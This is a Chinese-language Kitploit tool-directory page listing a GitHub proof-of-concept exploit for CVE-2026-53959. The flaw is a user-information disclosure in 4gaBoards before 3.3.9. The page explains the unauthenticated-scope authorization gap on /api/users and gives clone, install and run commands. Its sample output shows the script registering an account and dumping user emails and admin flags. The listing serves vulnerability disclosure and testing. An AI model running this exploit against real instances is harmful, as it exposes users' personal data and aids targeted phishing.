Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-53959 — 4gaBoards < 3.3.9 - 用户信息泄露 | Kitploit
工具/GitHubGitHub/anirbala98/cve-2026-53959
漏洞分析漏洞利用Web应用程序漏洞利用信息收集Web安全渗透测试学习与教育API 安全
GitHubanirbala98/cve-2026-53959

CVE-2026-53959

4gaBoards < 3.3.9 - 用户信息泄露

查看仓库
11天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-53959 - 4gaBoards < 3.3.9 - 用户信息泄露

本仓库包含针对 CVE-2026-53959 的概念验证(PoC)漏洞利用代码

免责声明

本项目仅供教育目的和授权安全测试使用。请勿将其用于你不拥有或无权限测试的系统。

概述

4gaBoards 是一个用于实时项目管理的看板系统。在 3.3.9 版本之前,4gaBoards 允许任何已认证用户通过 GET /api/users 枚举所有用户的账户信息,并通过 GET /api/users/:id 检索任意账户。users/index 和 users/show 操作仅依赖 server/config/policies.js 中的默认 is-authenticated 策略,而 server/api/controllers/users/index.js 直接返回 sails.helpers.users.getMany() 的结果,没有进行针对请求者的授权检查或响应清理。响应会暴露邮箱、电话、组织、姓名、isAdmin、ssoGoogleEmail、ssoGithubEmail 以及其他 SSO 关联的邮箱字段,包括管理员的数据。这会导致全实例范围内的用户枚举、隐私泄露和有针对性钓鱼侦察。该问题已在 3.3.9 版本中修复。

受影响版本

组件版本
存在漏洞<=3.3.8
已修复3.3.9

环境要求

  • Python 3.13.14
  • Requests 2.32.5

安装

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-53959.git
cd CVE-2026-53959/
pip install -r requirements.txt

使用方法

root@kitploit:~
python exploit.py <base_url>
python exploit.py http://localhost:3000

示例

root@kitploit:~
└─$ python exploit.py http://localhost:3000
[*] Creating a new user...
[+] Registration successful! 
[+] Retrieved Access Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjRjOTE1NzNmLTY5YzktNGQ5OS04ZWUxLWQ1ODZjNzZkNzAyZiJ9.eyJpYXQiOjE3ODcxMjExNzUsInN1YiI6IjE4NDQ5MDI5OTc5OTQyNDMzNTAiLCJleHAiOjE4MTg2NTcxNzV9.OwNTyxE-JS0pztbX4sLz0uzu3GjeyETNFQVbGVxzXxA

[*] Dumping user information...

{"items":[{"id":"1844837973439284230","createdAt":"2026-08-19T04:23:44.000Z","updatedAt":null,"email":"[email protected]","isAdmin":true,"isVerified":false,"name":"Demo Demo","username":"demo","phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":"2026-08-19T06:29:23.463Z","lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844837973439284230","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null},{"id":"1844902997994243350","createdAt":"2026-08-19T06:32:55.000Z","updatedAt":null,"email":"[email protected]","isAdmin":false,"isVerified":false,"name":"test","username":null,"phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":null,"lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844902997994243350","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null}]}

缓解措施

请将 4gaBoards 升级至 3.3.9 或更高版本。

参考链接

  • https://www.tenable.com/cve/CVE-2026-53959
  • https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p
下载工具